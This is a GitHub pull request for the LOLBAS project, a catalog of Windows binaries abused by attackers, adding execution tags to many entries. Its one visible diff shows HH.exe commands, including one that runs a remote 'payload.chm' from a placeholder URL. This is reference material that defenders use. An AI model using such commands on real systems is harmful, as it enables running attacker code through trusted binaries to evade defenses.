-
Notifications
You must be signed in to change notification settings - Fork 1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Pull request: Added Execute Tags to most of the LOLBas #405
Open
hegusung
wants to merge
149
commits into
LOLBAS-Project:master
Choose a base branch
from
hegusung:push-request3
base: master
Could not load branches
Branch not found: {{ refName }}
Loading
Could not load tags
Nothing to show
Loading
Are you sure you want to change the base?
Some commits from the old base branch may be removed from the timeline,
and old review comments may become outdated.
Open
Changes from all commits
Commits
Show all changes
149 commits
Select commit
Hold shift + click to select a range
8715370
Update gh-pages.yml
hegusung 679b321
Update gh-pages.yml
hegusung 0795916
Update gh-pages.yml
hegusung 56ad2e7
Update Installutil.yml
hegusung 0e177e7
Update gh-pages.yml
hegusung e573103
Update Addinutil.yml
hegusung 58d2f4c
Update At.yml
hegusung a199ff5
Update Atbroker.yml
hegusung 6d4ac1c
Update Bash.yml
hegusung 3123301
Update Certoc.yml
hegusung 6546853
Update Cmstp.yml
hegusung bb484e2
Update Conhost.yml
hegusung 2bf4516
Update Control.yml
hegusung 20ff06d
Update Cscript.yml Tags
hegusung 7642b8c
Update CustomShellHost.yml Tags
hegusung daee90f
Update Dfsvc.yml Tags
hegusung 0c36af1
Update Diskshadow.yml Tags
hegusung 524ef32
Update Dnscmd.yml Tags
hegusung ec76e9e
Update Explorer.yml Tags
hegusung 44a2e0c
Update Extexport.yml Tags
hegusung 3db62ff
Update Forfiles.yml Tags
hegusung d8c1def
Update Fsutil.yml Tags
hegusung eb06fb5
Update Ftp.yml Tags
hegusung 4e60ead
Update Gpscript.yml Tags
hegusung bbe0681
Update Hh.yml Tags and Added command
hegusung 0a87854
Update Ie4uinit.yml
hegusung 5210291
Update Iediagcmd.yml Tags
hegusung e8c0c77
Update Ieexec.yml Tags
hegusung f3739fa
Update Infdefaultinstall.yml Tags
hegusung bb2ab8c
Update Mavinject.yml Tags
hegusung 699d8e9
Update Microsoft.Workflow.Compiler.yml Tags
hegusung 75cd575
Category Bugfix
hegusung 504c922
Update Hh.yml Tags
hegusung 377c4b4
Update Mmc.yml Tags
hegusung eef914d
Update Msbuild.yml Tags
hegusung a88747c
Update Msconfig.yml Tags
hegusung 9f3b237
Update Msdt.yml Tags
hegusung b8d98f0
Update Msedge.yml Tags
hegusung bd07c4d
Update Mshta.yml Tags
hegusung 090f8e2
Update Msiexec.yml Tags
hegusung 7783b43
Update Pcalua.yml Tags
hegusung 5a1370c
Update Pcwrun.yml Tags
hegusung 741e087
Update Pnputil.yml Tags
hegusung 8d6bd28
Update Presentationhost.yml Tags
hegusung d1f6a8a
Update Provlaunch.yml Tags
hegusung 9aa4200
Update Regasm.yml Tags
hegusung ce907b4
Update Regsvcs.yml Tags
hegusung b452a6c
Update Regsvr32.yml Tags
hegusung 39adfc2
Update Rundll32.yml Tags
hegusung 3346739
Update Runexehelper.yml Tags
hegusung 7047b05
Update Runonce.yml Tags
hegusung a5191c7
Update Runscripthelper.yml Tags
hegusung fb19b66
Update Sc.yml Tags
hegusung 83a18ae
Update Schtasks.yml Tags
hegusung cb302b5
Update Scriptrunner.yml Tags
hegusung a8649af
Update Setres.yml Tags
hegusung a6de1f2
Update SettingSyncHost.yml Tags
hegusung d904027
Update Ssh.yml Tags
hegusung dfec93e
Update Stordiag.yml Tags
hegusung d6e2244
Update Syncappvpublishingserver.yml
hegusung 7d9ce4b
Update Ttdinject.yml Tags:
hegusung 9fddf9b
Update Tttracer.yml Tags
hegusung e3df4d3
Update Unregmp2.yml Tags
hegusung 615dd80
Update Vbc.yml Tags
hegusung 9464d66
Update Verclsid.yml tags
hegusung 266a379
Update Wab.yml Tags
hegusung 7a5c247
Update Winget.yml Tags
hegusung e792f14
Update Wlrmdr.yml Tags
hegusung 6959072
Update Wmic.yml Tags
hegusung 9a4b3e2
Update WorkFolders.yml Tags
hegusung 9c6e722
Update Xwizard.yml Tags
hegusung df306a4
Update msedge_proxy.yml Tags
hegusung dd7be51
Update msedgewebview2.yml Tags
hegusung 6375a4a
Update wt.yml
hegusung 75d04ea
Correct identation
hegusung e07907c
Removed Fixed and Custom Format tags
hegusung c34810b
Update Mshta.yml Tags
hegusung e25d9fa
Update Advpack.yml Tags
hegusung 87241b3
Update Desk.yml Tags
hegusung f086057
Update Dfshim.yml Tags
hegusung f09cfa5
Update Ieadvpack.yml Tags
hegusung 0672acf
Update Ieframe.yml Tags
hegusung 98dde3b
Update Mshtml.yml Tags
hegusung 25047c3
Update Pcwutl.yml Tags
hegusung b1d0a85
Update Setupapi.yml Tags
hegusung a28f2a7
Update Shdocvw.yml Tags
hegusung eb9dfde
Update Shell32.yml Tags
hegusung 7533fea
Update Syssetup.yml Tags
hegusung 5a169e4
Update Url.yml Tags
hegusung 9ebae9a
Update Zipfldr.yml Tags
hegusung 1f57c14
Update CL_LoadAssembly.yml Tags
hegusung cb73a1c
Update CL_mutexverifiers.yml tags
hegusung 4c232b0
Update Cl_invocation.yml Tags
hegusung a7b0dfc
Update Launch-VsDevShell.yml Tags
hegusung 4295f69
Update Manage-bde.yml Tags
hegusung 8673165
Update Pubprn.yml Tags
hegusung 66510df
Update Syncappvpublishingserver.yml Tags
hegusung ac7ac2a
Update UtilityFunctions.yml Tags
hegusung 7606076
Update Winrm.yml Tags
hegusung 43ae6c8
Update pester.yml Tags and removed duplicate
hegusung c9f0857
Update CL_mutexverifiers.yml: Identation change
hegusung 16d84e3
Update AccCheckConsole.yml Tags
hegusung a01bab7
Update Adplus.yml Tags
hegusung 8fc6995
Update Agentexecutor.yml Tags
hegusung f4cd4d0
Update Appcert.yml Tags
hegusung e4f73cf
Update Appvlp.yml Tags
hegusung 351a3bc
Update Bginfo.yml Tags
hegusung 37eaa48
Update Cdb.yml Tags
hegusung edf0105
Update Coregen.yml Tags
hegusung 83c34ff
Update Csi.yml Tags
hegusung eb3afc6
Update DefaultPack.yml Tags
hegusung 6e9faa6
Update Devinit.yml Tags
hegusung 1ba7b66
Update Devtoolslauncher.yml Tags
hegusung bd6667b
Update Dnx.yml Tags
hegusung b24f3ab
Update Dotnet.yml tags
hegusung e2d2633
Update Dxcap.yml Tags
hegusung bc80d35
Update Fsi.yml tags
hegusung a5ede45
Update FsiAnyCpu.yml tags
hegusung 5f2bc7e
Update Mftrace.yml Tags
hegusung e839f4b
Update Microsoft.NodejsTools.PressAnyKey.yml Tags
hegusung 2e922f4
Update Msdeploy.yml Tags
hegusung f9ea58c
Update Msxsl.yml Tags
hegusung 7b7c58b
Update OpenConsole.yml Tags
hegusung c6753c4
Update Rcsi.yml Tags
hegusung fa2ded3
Update Remote.yml Tags
hegusung 57e5e0d
Update Sqlps.yml Tags
hegusung 4df50e3
Update Sqltoolsps.yml Tags
hegusung ae12e13
Update Squirrel.yml tags
hegusung 384d674
Update Te.yml Tags
hegusung ce9d4e5
Update Teams.yml Tags
hegusung 927189f
Update Update.yml Tags
hegusung f080b42
Update VSDiagnostics.yml Tags
hegusung 780b478
Update VSIISExeLauncher.yml Tags
hegusung ed5266d
Update VisualUiaVerifyNative.yml Tags
hegusung e0b8769
Update VsLaunchBrowser.yml Tags
hegusung d170ef4
Update Vshadow.yml Tags
hegusung ec0a196
Update Vsjitdebugger.yml Tags
hegusung f428073
Update Wfc.yml Tags
hegusung 842865c
Update Wsl.yml Tags
hegusung cc88242
Update winfile.yml Tags
hegusung 8e3710a
Update Csi.yml: Syntax error
hegusung f06ab89
Revert "Update gh-pages.yml"
hegusung 0dc5a46
Revert "Update gh-pages.yml"
hegusung 3cfdfdc
Revert "Update gh-pages.yml"
hegusung 0935d63
Revert "Update gh-pages.yml"
hegusung b1fb82a
Update Dfshim.yml: Typo
hegusung ab3ea8f
Merge pull request #1 from hegusung/master
hegusung 089614e
Various changes to Execute tags
wietze b46fc3f
Fixing issue with hh.yml
wietze File filter
Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
|
@@ -11,13 +11,30 @@ Commands: | |
Privileges: User | ||
MitreID: T1105 | ||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 | ||
Tags: | ||
- Execute: EXE | ||
- Application: GUI | ||
- Command: HH.exe c:\windows\system32\calc.exe | ||
Description: Executes calc.exe with HTML Help. | ||
Usecase: Execute process with HH.exe | ||
Category: Execute | ||
Privileges: User | ||
MitreID: T1218.001 | ||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 | ||
Tags: | ||
- Execute: EXE | ||
- Application: GUI | ||
- Command: HH.exe http://some.url/payload.chm | ||
Description: Executes a remote payload.chm file which can contain commands. | ||
Usecase: Execute commands with HH.exe | ||
Category: Execute | ||
Privileges: User | ||
MitreID: T1218.001 | ||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 | ||
Tags: | ||
- Execute: CMD | ||
- Execute: CHM | ||
- Execute: Remote | ||
Comment on lines
+27
to
+37
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Same here |
||
Full_Path: | ||
- Path: C:\Windows\hh.exe | ||
- Path: C:\Windows\SysWOW64\hh.exe | ||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Oops, something went wrong.
Oops, something went wrong.
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Where did this come from?